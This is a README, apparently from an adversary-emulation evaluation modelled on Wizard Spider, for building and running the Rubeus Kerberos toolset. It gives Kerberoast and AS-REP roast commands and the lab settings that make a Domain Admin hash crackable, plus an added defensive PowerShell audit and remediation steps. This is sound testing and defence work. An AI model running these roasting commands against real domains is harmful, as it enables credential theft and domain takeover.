# Rubeus

"Rubeus is a C# toolset for raw Kerberos interaction and abuses."

The goal for this evaluation is to steal the hash of the Domain Admin as a Domain User.

# Build Instructions

Open the command prompt (cmd.exe), navigate to the directory containing the Rubeus Visual Studio solution file (Rubeus.sln), and run the devenv.exe command:

```
cd wizard_spider\Resources\Rubeus
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe" Rubeus.sln /build Release
```

Alternatively, build with MSBuild:

```
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\msbuild.exe" Rubeus.sln -property:Configuration=Release
```

The executable will be found in the bin\Release folder.

# Test Instructions

Open PowerShell and run the test script from the Rubeus directory (PowerShell requires the `.\` prefix to run a script in the current directory):

```
cd wizard_spider\Resources\Rubeus\
.\rubeus_test.ps1
```

# Usage Examples

```
# execute AS-REP Roast
rubeus.exe asreproast /domain:oz.local

# execute Kerberoast
# must be executed as a domain user (oz\user) NOT a local user (dorothy\user)
# may want to consider adding /format:hashcat as an argument (default format is John)
rubeus.exe kerberoast /domain:oz.local
```

# Cleanup Instructions

Open a command prompt or PowerShell and delete the binary:

```
del rubeus.exe
```

# Misc

Conditions required to successfully compromise the Domain Admin password via Kerberoasting during the evaluation:

  • The Domain Admin must have a crackable password

  • The Domain Admin must have a Service Principal Name (SPN) associated with their account. Example command to set the SPN:

```
setspn -s exchange/oz.local oz/kfleming
```

Additionally, the CTI indicates the adversary also attempts AS-REP Roasting. For this to work, Kerberos pre-authentication must be disabled for the account (it is enabled by default):

  • Log into the Domain Controller

  • Run (Windows-R) dsa.msc

  • Select the Domain Admin account

  • Go to the Account tab

  • In account options, check 'Do not require Kerberos preauthentication'
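The two conditions above (an SPN on a Domain Admin account, and pre-authentication disabled) are exactly what a defender should audit for after the evaluation, so the range is not left in place. The following PowerShell check is an added example, not part of the original README or of Rubeus; it assumes the RSAT ActiveDirectory module is installed and uses the oz.local domain name from this page.

```powershell
# Added audit check (not from the Rubeus README): list Domain Admins that are
# currently Kerberoastable (SPN set) or AS-REP roastable (pre-auth disabled).
# Assumes the RSAT ActiveDirectory module and read access to the directory.
Import-Module ActiveDirectory

function Get-KerberosRoastExposure {
    param(
        [string]$Server = 'oz.local',      # domain used in this README
        [string]$Group  = 'Domain Admins'
    )
    # Resolve membership recursively so nested admin accounts are included.
    $members = Get-ADGroupMember -Identity $Group -Recursive -Server $Server |
               Where-Object { $_.objectClass -eq 'user' }

    foreach ($m in $members) {
        $u = Get-ADUser -Identity $m.distinguishedName -Server $Server `
                        -Properties ServicePrincipalName, DoesNotRequirePreAuth, PasswordLastSet
        [pscustomobject]@{
            SamAccountName  = $u.SamAccountName
            # Any SPN on a privileged account lets a domain user request a TGS
            # encrypted with that account's password hash (Kerberoast condition).
            HasSPN          = ($u.ServicePrincipalName.Count -gt 0)
            SPNs            = ($u.ServicePrincipalName -join ';')
            # userAccountControl bit 0x400000 (DONT_REQ_PREAUTH) set
            # (AS-REP roast condition).
            PreAuthDisabled = [bool]$u.DoesNotRequirePreAuth
            PasswordLastSet = $u.PasswordLastSet
        }
    }
}

# Report only the accounts that satisfy at least one condition.
Get-KerberosRoastExposure |
    Where-Object { $_.HasSPN -or $_.PreAuthDisabled } |
    Format-Table -AutoSize

# Domain-wide sweep for pre-auth disabled on any account, via the LDAP bitwise
# AND matching rule on userAccountControl (4194304 = 0x400000).
Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=4194304)' -Server 'oz.local' |
    Select-Object SamAccountName, DistinguishedName

# Remediation after the exercise: re-enable pre-auth with
#   Set-ADAccountControl -Identity kfleming -DoesNotRequirePreAuth $false
# and remove the test SPN with  setspn -d exchange/oz.local oz/kfleming
```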

# CTI Evidence

https://attack.mitre.org/groups/G0102/
https://thedfirreport.com/2020/10/08/ryuks-return/
https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/

# References

https://github.com/GhostPack/Rubeus
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spn-setspn-syntax.aspx
https://blog.zsec.uk/path2da-pt2/
https://docs.microsoft.com/en-us/visualstudio/ide/reference/build-devenv-exe?view=vs-2019